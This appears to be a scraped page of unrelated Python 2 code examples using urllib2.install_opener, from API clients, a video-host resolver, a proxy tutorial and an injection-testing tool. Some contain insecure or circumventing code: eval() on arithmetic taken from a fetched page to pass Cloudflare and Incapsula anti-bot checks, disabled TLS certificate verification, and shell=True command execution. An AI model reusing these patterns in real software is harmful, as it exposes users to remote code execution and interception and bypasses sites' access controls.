     self.oauth_token_secret = oauth_token_secret
     self.save_oauth_credentials = save_oauth_credentials
     self.auth_string = None
     if not self.__checkconn():
         raise Exception("Couldn't access %s, it may well be down." %
                         (api_path))
     if self.use_auth:
         if auth_type == "basic":
             self.auth_string = base64.encodestring(
                 '%s:%s' % (username, password))[:-1]
             if self.is_twitter:
                 raise Exception(
                     "Twitter does not support basic auth; bailing out.")
             if not self.account_verify_credentials():
                 raise Exception("Invalid credentials")
         elif auth_type == "oauth":
             if has_oauth:
                 self.consumer = oauth.OAuthConsumer(
                     str(consumer_key), str(consumer_secret))
                 self.oauth_initialize()
                 if self.is_twitter:
                     self.api_path += "/1"
                 if not self.account_verify_credentials():
                     raise Exception("OAuth authentication failed")
             else:
                 raise Exception("OAuth could not be initialised.")
         self.server_config = self.statusnet_config()
         try:
             self.length_limit = int(
                 self.server_config["site"]
                 ["textlimit"])  # this will be 0 on unlimited instances
         except:
             self.length_limit = 0  # assume unlimited on failure to get a defined limit
         self.tz = self.server_config["site"]["timezone"]
Example #53
0
        fp = TCPFile(data)
        if data:
            headers = {
                'Content-type': 'application/octet-stream',
                'Content-length': len(data),
            }
            code = 200
        else:
            headers = {}
            code = 404

        return urllib.addinfourl(fp, headers, req.get_full_url(), code=code)


urllib2.install_opener(urllib2.build_opener(TCPReaderHandler()))


class DnsCommandClientDecodingError(Exception):
    pass


__DEBUG = 0

if __DEBUG:
    import dns.resolver
    resolver = dns.resolver.Resolver()
    resolver.nameservers = ['127.0.0.1']
    resolver.port = 5454
    socket.gethostbyname_ex = lambda x: (
        None, None, [str(rdata) for rdata in resolver.query(x, 'A')])
Example #54
0
    user_config = {}

    try:
        execfile(filename, user_config)
    except SyntaxError, e:
        sys.stderr.write('Syntax error in config file: %s\n'
                         'Line %i offset %i\n' %
                         (filename, e.lineno, e.offset))
        sys.exit(1)

    auth_handler = urllib2.HTTPBasicAuthHandler()
    auth_handler.add_password(realm='Web API',
                              uri=RBWEBSITE_API_URL,
                              user=user_config['USERNAME'],
                              passwd=user_config['PASSWORD'])
    opener = urllib2.build_opener(auth_handler)
    urllib2.install_opener(opener)


def execute(cmdline):
    if isinstance(cmdline, list):
        print(">>> %s" % subprocess.list2cmdline(cmdline))
    else:
        print(">>> %s" % cmdline)

    p = subprocess.Popen(cmdline, shell=True, stdout=subprocess.PIPE)

    s = ''

    for data in p.stdout.readlines():
        s += data
Example #55
0
    def send_http(self, messages, channel='default'):
        import urllib2, json, time, cookielib
        print_error("send_http", messages)

        if self.proxy:
            import socks
            socks.setdefaultproxy(
                proxy_modes.index(self.proxy["mode"]) + 1, self.proxy["host"],
                int(self.proxy["port"]))
            socks.wrapmodule(urllib2)

        cj = cookielib.CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
        urllib2.install_opener(opener)

        t1 = time.time()

        data = []
        for m in messages:
            method, params = m
            if type(params) != type([]): params = [params]
            data.append({
                'method': method,
                'id': self.message_id,
                'params': params
            })
            self.unanswered_requests[self.message_id] = method, params, channel
            self.message_id += 1

        if data:
            data_json = json.dumps(data)
        else:
            # poll with GET
            data_json = None

        headers = {'content-type': 'application/json'}
        if self.session_id:
            headers['cookie'] = 'SESSION=%s' % self.session_id

        try:
            req = urllib2.Request(self.connection_msg, data_json, headers)
            response_stream = urllib2.urlopen(req, timeout=DEFAULT_TIMEOUT)
        except:
            return

        for index, cookie in enumerate(cj):
            if cookie.name == 'SESSION':
                self.session_id = cookie.value

        response = response_stream.read()
        self.bytes_received += len(response)
        if response:
            response = json.loads(response)
            if type(response) is not type([]):
                self.queue_json_response(response)
            else:
                for item in response:
                    self.queue_json_response(item)

        if response:
            self.poll_interval = 1
        else:
            if self.poll_interval < 15:
                self.poll_interval += 1
        #print self.poll_interval, response

        self.rtime = time.time() - t1
        self.is_connected = True
Example #56
0
def do_check(request):

    # Check if defined any Host HTTP header.
    if menu.options.host and settings.HOST_INJECTION == None:
        request.add_header('Host', menu.options.host)

    # Check if defined any User-Agent HTTP header.
    if menu.options.agent:
        request.add_header('User-Agent', menu.options.agent)

    # Check if defined any Referer HTTP header.
    if menu.options.referer and settings.REFERER_INJECTION == None:
        request.add_header('Referer', menu.options.referer)

    # Check if defined any Cookie HTTP header.
    if menu.options.cookie and settings.COOKIE_INJECTION == False:
        request.add_header('Cookie', menu.options.cookie)

    # Check if defined any HTTP Authentication credentials.
    # HTTP Authentication: Basic / Digest Access Authentication.
    if not menu.options.ignore_401:
        if menu.options.auth_cred and menu.options.auth_type:
            try:
                settings.SUPPORTED_HTTP_AUTH_TYPES.index(
                    menu.options.auth_type)
                if menu.options.auth_type == "basic":
                    b64_string = base64.encodestring(
                        menu.options.auth_cred).replace('\n', '')
                    request.add_header("Authorization",
                                       "Basic " + b64_string + "")
                elif menu.options.auth_type == "digest":
                    try:
                        url = menu.options.url
                        try:
                            response = urllib2.urlopen(url)
                        except urllib2.HTTPError, e:
                            try:
                                authline = e.headers.get(
                                    'www-authenticate', '')
                                authobj = re.match('''(\w*)\s+realm=(.*),''',
                                                   authline).groups()
                                realm = authobj[1].split(',')[0].replace(
                                    "\"", "")
                                user_pass_pair = menu.options.auth_cred.split(
                                    ":")
                                username = user_pass_pair[0]
                                password = user_pass_pair[1]
                                authhandler = urllib2.HTTPDigestAuthHandler()
                                authhandler.add_password(
                                    realm, url, username, password)
                                opener = urllib2.build_opener(authhandler)
                                urllib2.install_opener(opener)
                                result = urllib2.urlopen(url)
                            except AttributeError:
                                pass
                    except urllib2.HTTPError, e:
                        pass
            except ValueError:
                err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'."
                err_msg += " Try basic or digest HTTP authentication type."
                print settings.print_critical_msg(err_msg)
                sys.exit(0)
        else:
            pass

    # The MIME media type for JSON.
    if settings.IS_JSON:
        request.add_header("Content-Type", "application/json")

    # Check if defined any extra HTTP headers.
    if menu.options.headers or menu.options.header:
        # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided.
        if menu.options.headers:
            menu.options.headers = checks.wildcard_character(
                menu.options.headers)
            extra_headers = menu.options.headers
        else:
            menu.options.header = checks.wildcard_character(
                menu.options.header)
            extra_headers = menu.options.header

        extra_headers = extra_headers.replace(":", ": ")
        if ": //" in extra_headers:
            extra_headers = extra_headers.replace(": //", "://")

        if "\\n" in extra_headers:
            extra_headers = extra_headers.split("\\n")
            # Remove empty strings
            extra_headers = [x for x in extra_headers if x]
            if menu.options.header and not menu.options.headers and len(
                    extra_headers) > 1:
                warn_msg = "Swithing '--header' to '--headers' "
                warn_msg += "due to multiple extra HTTP headers."
                print settings.print_warning_msg(warn_msg)

        else:
            tmp_extra_header = []
            tmp_extra_header.append(extra_headers)
            extra_headers = tmp_extra_header

        for extra_header in extra_headers:
            # Extra HTTP Header name
            http_header_name = re.findall(r"(.*): ", extra_header)
            http_header_name = ''.join(http_header_name).strip()
            # Extra HTTP Header value
            http_header_value = re.findall(r":(.*)", extra_header)
            http_header_value = ''.join(http_header_value).strip()
            # Check if it is a custom header injection.
            if settings.CUSTOM_HEADER_INJECTION == False and \
               settings.INJECT_TAG in http_header_value:
                settings.CUSTOM_HEADER_INJECTION = True
                settings.CUSTOM_HEADER_NAME = http_header_name
            request.add_header(http_header_name, http_header_value)
Example #57
0
def request(url, close=True, error=False, proxy=None, post=None, headers=None, mobile=False, safe=False, referer=None, cookie=None, output='', timeout='30'):
    try:
        handlers = []
        if not proxy == None:
            handlers += [urllib2.ProxyHandler({'http':'%s' % (proxy)}), urllib2.HTTPHandler]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        if output == 'cookie' or not close == True:
            import cookielib
            cookies = cookielib.LWPCookieJar()
            handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        try:
            if sys.version_info < (2, 7, 9): raise Exception()
            import ssl; ssl_context = ssl.create_default_context()
            ssl_context.check_hostname = False
            ssl_context.verify_mode = ssl.CERT_NONE
            handlers += [urllib2.HTTPSHandler(context=ssl_context)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        except:
            pass

        try: headers.update(headers)
        except: headers = {}
        if 'User-Agent' in headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'referer' in headers:
            pass
        elif referer == None:
            headers['referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
        else:
            headers['referer'] = referer
        if not 'Accept-Language' in headers:
            headers['Accept-Language'] = 'en-US'
        if 'cookie' in headers:
            pass
        elif not cookie == None:
            headers['cookie'] = cookie

        request = urllib2.Request(url, data=post, headers=headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            if error == False: return

        if output == 'cookie':
            result = []
            for c in cookies: result.append('%s=%s' % (c.name, c.value))
            result = "; ".join(result)
        elif output == 'response':
            if safe == True:
                result = (str(response.code), response.read(224 * 1024))
            else:
                result = (str(response.code), response.read())
        elif output == 'chunk':
            content = int(response.headers['Content-Length'])
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
        elif output == 'geturl':
            result = response.geturl()
        else:
            if safe == True:
                result = response.read(224 * 1024)
            else:
                result = response.read()
        if close == True:
            response.close()

        return result
    except:
        return
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import urllib2

# 代理开关,表示是否启用代理
proxyswitch = 0

# 构建一个Handler处理器对象,参数是一个字典类型,包括代理类型和代理服务器IP+PROT
httpproxy_handler = urllib2.ProxyHandler({"http": "218.106.98.166:53281"})

# 构建了一个没有代理的处理器对象
nullproxy_handler = urllib2.ProxyHandler({})

if proxyswitch:
    opener = urllib2.build_opener(httpproxy_handler)
else:
    opener = urllib2.build_opener(nullproxy_handler)

# 构建了一个全局的opener,之后所有的请求都可以用urlopen()方式去发送,也附带Handler的功能
urllib2.install_opener(opener)

request = urllib2.Request("http://www.baidu.com/")
response = urllib2.urlopen(request)

#print response.read().decode("gbk")
print response.read()
Example #59
0
    def billionuploads(self, url):
        try:
            cookie_file = os.path.join(cookiepath, 'billionuploads.lwp')

            cj = cookielib.LWPCookieJar()
            if os.path.exists(cookie_file):
                try:
                    cj.load(cookie_file, True)
                except:
                    cj.save(cookie_file, True)
            else:
                cj.save(cookie_file, True)

            normal = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
            headers = [
                ('User-Agent',
                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0'
                 ),
                ('Accept',
                 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
                 ), ('Accept-Language', 'en-US,en;q=0.5'),
                ('Accept-Encoding', ''), ('DNT', '1'),
                ('Connection', 'keep-alive'), ('Pragma', 'no-cache'),
                ('Cache-Control', 'no-cache')
            ]
            normal.addheaders = headers

            class NoRedirection(urllib2.HTTPErrorProcessor):
                # Stop Urllib2 from bypassing the 503 page.
                def http_response(self, request, response):
                    code, msg, hdrs = response.code, response.msg, response.info(
                    )
                    return response

                https_response = http_response

            opener = urllib2.build_opener(NoRedirection,
                                          urllib2.HTTPCookieProcessor(cj))
            opener.addheaders = normal.addheaders
            response = opener.open(url).read()
            decoded = re.search('(?i)var z="";var b="([^"]+?)"', response)
            if decoded:
                decoded = decoded.group(1)
                z = []
                for i in range(len(decoded) / 2):
                    z.append(int(decoded[i * 2:i * 2 + 2], 16))
                decoded = ''.join(map(unichr, z))
                incapurl = re.search(
                    '(?i)"GET","(/_Incapsula_Resource[^"]+?)"', decoded)
                if incapurl:
                    incapurl = 'http://billionuploads.com' + incapurl.group(1)
                    opener.open(incapurl)
                    cj.save(cookie_file, True)
                    response = opener.open(url).read()

            captcha = re.search(
                '(?i)<iframe src="(/_Incapsula_Resource[^"]+?)"', response)
            if captcha:
                captcha = 'http://billionuploads.com' + captcha.group(1)
                opener.addheaders.append(('Referer', url))
                response = opener.open(captcha).read()
                formurl = 'http://billionuploads.com' + re.search(
                    '(?i)<form action="(/_Incapsula_Resource[^"]+?)"',
                    response).group(1)
                resource = re.search('(?i)src=" (/_Incapsula_Resource[^"]+?)"',
                                     response)
                if resource:
                    import random
                    resourceurl = 'http://billionuploads.com' + resource.group(
                        1) + str(random.random())
                    opener.open(resourceurl)
                recaptcha = re.search(
                    '(?i)<script type="text/javascript" src="(https://www.google.com/recaptcha/api[^"]+?)"',
                    response)
                if recaptcha:
                    response = opener.open(recaptcha.group(1)).read()
                    challenge = re.search('''(?i)challenge : '([^']+?)',''',
                                          response)
                    if challenge:
                        challenge = challenge.group(1)
                        captchaimg = 'https://www.google.com/recaptcha/api/image?c=' + challenge
                        img = xbmcgui.ControlImage(450, 15, 400, 130,
                                                   captchaimg)
                        wdlg = xbmcgui.WindowDialog()
                        wdlg.addControl(img)
                        wdlg.show()

                        xbmc.sleep(3000)

                        kb = xbmc.Keyboard(
                            '', 'Please enter the text in the image', False)
                        kb.doModal()
                        capcode = kb.getText()
                        if (kb.isConfirmed()):
                            userInput = kb.getText()
                            if userInput != '': capcode = kb.getText()
                            elif userInput == '':
                                logerror(
                                    'BillionUploads - Image-Text not entered')
                                xbmc.executebuiltin(
                                    "XBMC.Notification(Image-Text not entered.,BillionUploads,2000)"
                                )
                                return None
                        else:
                            return None
                        wdlg.close()
                        captchadata = {}
                        captchadata['recaptcha_challenge_field'] = challenge
                        captchadata['recaptcha_response_field'] = capcode
                        opener.addheaders = headers
                        opener.addheaders.append(('Referer', captcha))
                        resultcaptcha = opener.open(
                            formurl, urllib.urlencode(captchadata)).info()
                        opener.addheaders = headers
                        response = opener.open(url).read()

            ga = re.search('(?i)"text/javascript" src="(/ga[^"]+?)"', response)
            if ga:
                jsurl = 'http://billionuploads.com' + ga.group(1)
                p = "p=%7B%22appName%22%3A%22Netscape%22%2C%22platform%22%3A%22Win32%22%2C%22cookies%22%3A1%2C%22syslang%22%3A%22en-US%22"
                p += "%2C%22userlang%22%3A%22en-US%22%2C%22cpu%22%3A%22WindowsNT6.1%3BWOW64%22%2C%22productSub%22%3A%2220100101%22%7D"
                opener.open(jsurl, p)
                response = opener.open(url).read()

    #         pid = re.search('(?i)PID=([^"]+?)"', response)
    #         if pid:
    #             normal.addheaders += [('Cookie','D_UID='+pid.group(1)+';')]
    #             opener.addheaders = normal.addheaders
            if re.search('(?i)url=/distil_r_drop.html', response) and filename:
                url += '/' + filename
                response = normal.open(url).read()
            jschl = re.compile('name="jschl_vc" value="(.+?)"/>').findall(
                response)
            if jschl:
                jschl = jschl[0]
                maths = re.compile('value = (.+?);').findall(
                    response)[0].replace('(', '').replace(')', '')
                domain_url = re.compile('(https?://.+?/)').findall(url)[0]
                domain = re.compile('https?://(.+?)/').findall(domain_url)[0]
                final = normal.open(
                    domain_url +
                    'cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' %
                    (jschl, eval(maths) + len(domain))).read()
                html = normal.open(url).read()
            else:
                html = response

            data = {}
            r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">', html)
            for name, value in r:
                data[name] = value

            captchaimg = re.search(
                '<img src="((?:http://|www\.)?BillionUploads.com/captchas/.+?)"',
                html)
            if captchaimg:

                img = xbmcgui.ControlImage(550, 15, 240, 100,
                                           captchaimg.group(1))
                wdlg = xbmcgui.WindowDialog()
                wdlg.addControl(img)
                wdlg.show()

                kb = xbmc.Keyboard('', 'Please enter the text in the image',
                                   False)
                kb.doModal()
                capcode = kb.getText()
                if (kb.isConfirmed()):
                    userInput = kb.getText()
                    if userInput != '': capcode = kb.getText()
                    elif userInput == '':
                        showpopup(
                            'BillionUploads',
                            '[B]You must enter the text from the image to access video[/B]',
                            5000, elogo)
                        return None
                else:
                    return None
                wdlg.close()

                data.update({'code': capcode})

            data.update({'submit_btn': ''})
            enc_input = re.compile('decodeURIComponent\("(.+?)"\)').findall(
                html)
            if enc_input:
                dec_input = urllib2.unquote(enc_input[0])
                r = re.findall(r'type="hidden" name="(.+?)" value="(.*?)">',
                               dec_input)
                for name, value in r:
                    data[name] = value
            extradata = re.compile(
                "append\(\$\(document.createElement\('input'\)\).attr\('type','hidden'\).attr\('name','(.*?)'\).val\((.*?)\)"
            ).findall(html)
            if extradata:
                for attr, val in extradata:
                    if 'source="self"' in val:
                        val = re.compile(
                            '<textarea[^>]*?source="self"[^>]*?>([^<]*?)<'
                        ).findall(html)[0]
                    data[attr] = val.strip("'")
            r = re.findall("""'input\[name="([^"]+?)"\]'\)\.remove\(\)""",
                           html)

            for name in r:
                del data[name]

            normal.addheaders.append(('Referer', url))
            html = normal.open(url, urllib.urlencode(data)).read()
            cj.save(cookie_file, True)

            def custom_range(start, end, step):
                while start <= end:
                    yield start
                    start += step

            def checkwmv(e):
                s = ""
                i = []
                u = [[65, 91], [97, 123], [48, 58], [43, 44], [47, 48]]
                for z in range(0, len(u)):
                    for n in range(u[z][0], u[z][1]):
                        i.append(chr(n))
                t = {}
                for n in range(0, 64):
                    t[i[n]] = n
                for n in custom_range(0, len(e), 72):
                    a = 0
                    h = e[n:n + 72]
                    c = 0
                    for l in range(0, len(h)):
                        f = t.get(h[l], 'undefined')
                        if f == 'undefined': continue
                        a = (a << 6) + f
                        c = c + 6
                        while c >= 8:
                            c = c - 8
                            s = s + chr((a >> c) % 256)
                return s

            dll = re.compile(
                '<input type="hidden" id="dl" value="(.+?)">').findall(html)
            if dll:
                dl = dll[0].split('GvaZu')[1]
                dl = checkwmv(dl)
                dl = checkwmv(dl)
            else:
                alt = re.compile('<source src="([^"]+?)"').findall(html)
                if alt:
                    dl = alt[0]
                else:
                    raise Exception('Unable to resolve - No Video File Found')

            return dl

        except Exception, e:
            raise
Example #60
0
    if ('all' in uri and cookieExists('ALL', cookies) is False) or ('malware' in uri and cookieExists('MALWARE', cookies) is False) :
        # Since we do not have a cursor use the reset uri
        uri = config['resetUri']
# If cookie file is not on disk and you are not
# calling the test feed use the reset call to obtain cookie
elif 'test' not in uri:
    uri = config['resetUri']

# Create HTTP handlers
handlers = [
    urllib2.HTTPHandler(),
    urllib2.HTTPSHandler(),
    urllib2.HTTPCookieProcessor(cookies)
    ]
# Build URL opener object and pass handelers
opener = urllib2.build_opener(*handlers)

# Function that makes the request to API
def fetch(uri):
    req = urllib2.Request(uri)
    req.add_header('Authorization', 'Basic %s' % base64string)
    req.add_header('Accept', 'application/json')
    return opener.open(req)

# Function that saves the response to a file and saves cookies to file
def saveFiles(response, cookieFile, logFile):
    # Create a filename if no path is included it will save to the same directory the script is located
    # (this format is day_month_year-24hour_minute_second_Microsecond)
    # Format details can be found at https://docs.python.org/2/library/datetime.html#strftime-strptime-behavior
    filename = logFile
    # Save the Json response as a variable